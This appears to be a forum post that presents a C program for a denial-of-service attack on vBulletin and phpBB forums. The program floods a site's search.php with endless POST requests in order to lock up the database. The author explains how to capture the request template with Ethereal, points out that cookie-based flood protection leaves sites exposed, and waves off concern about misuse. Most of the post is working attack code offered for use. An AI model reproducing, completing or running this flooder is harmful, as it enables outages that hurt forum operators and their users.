Hacking vbulliten and phpbb - The Byzantine Attack

1. // I have figured out how to successfully crash any php-driven forum. Utilizing a public search, you can create multiple searches -- a hundred or so a second -- which causes the system to lock up from processing searches in its database. It is a non-browser-based html injection. Every forum I have encountered has flood protection based on cookies, and not by IP address. Most forums do not come with IP-based flood protection which surprises me.
2. // For reference, I called this the "VX Series", after the nerve gas which has the same characteristics of attack as this program has.
3. I have tested this on vbulliten, and phpbb. A bit of knowledge has to be used when writing this, as the writer will have to manually change certain variables in order to make this work. But because of this, versions of the forum do not matter, as when you edit it, you will specify certain changes. The easiest way of getting the correct syntax for a post method is to run Ethereal while performing a search, and then do a "follow stream" in Ethereal, which will display the information your browser sent to the forum.
4.  
5. // I am confident that I am not "arming kindergarteners" with this exploit. Though it is very easy to implement, knowing how to follow streams in Ethereal is a very hard concept to master....unless, of course, you know what you're doing, in which case it is easier than that drunk sorority chick whose name you've already forgotten.
6.  
7. #include "stdio.h"
8. #include "sys/types.h"
9. #include "sys/socket.h"
10. #include "netinet/in.h"
11. #include "netdb.h"  
12. int main() {
13. int sockfd, portno = 80, n, x=1;
14. struct sockaddr_in serv_addr; struct hostent *server;
15. server = gethostbyname("someforum.com");
16. char *headerinfo=(char *)malloc(4*BUFSIZ);
17.  
18. while(1){
19. ++x;
20.  
21. // this is where you enter the info from Ethereal.
22. sprintf(headerinfo, "POST /search.php HTTP/1.1\r\n"
23. "Host: \r\n"
24. "User-Agent: \r\n"
25. "Accept: \r\n"
26. "Accept-Language: \r\n"
27. "Accept-Encoding: \r\n"
28. "Accept-Charset: \r\n"
29. "Keep-Alive: 500\r\n"
30. "Connection: keep-alive\r\n"
31. "Referer: \r\n"
32. "Content-Type: \r\n"
33. "Content-Length: \r\n\r\n"
34.  
35. "search_variable");
36.  
37. sockfd = socket(AF_INET, SOCK_STREAM, 0);
38. if (sockfd < 0){
39. perror("ERROR opening socket");
40. exit(1);  }
41.  
42. if (server == NULL) {  
43. perror("ERROR, no such host\n");  
44. exit(0);
45. }
46.  
47. bzero((char *) &serv_addr, sizeof(serv_addr));
48. serv_addr.sin_family = AF_INET;
49. bcopy((char *)server->h_addr,(char *) //
50. &serv_addr.sin_addr.s_addr,server->h_length);
51. serv_addr.sin_port = htons(portno);
52. connect(sockfd,&serv_addr,sizeof(serv_addr));
53. write(sockfd,headerinfo,strlen(headerinfo));
54. close(sockfd);
55.  
56. write(1, ".", 1);
57. }  
58. return 0;
59. }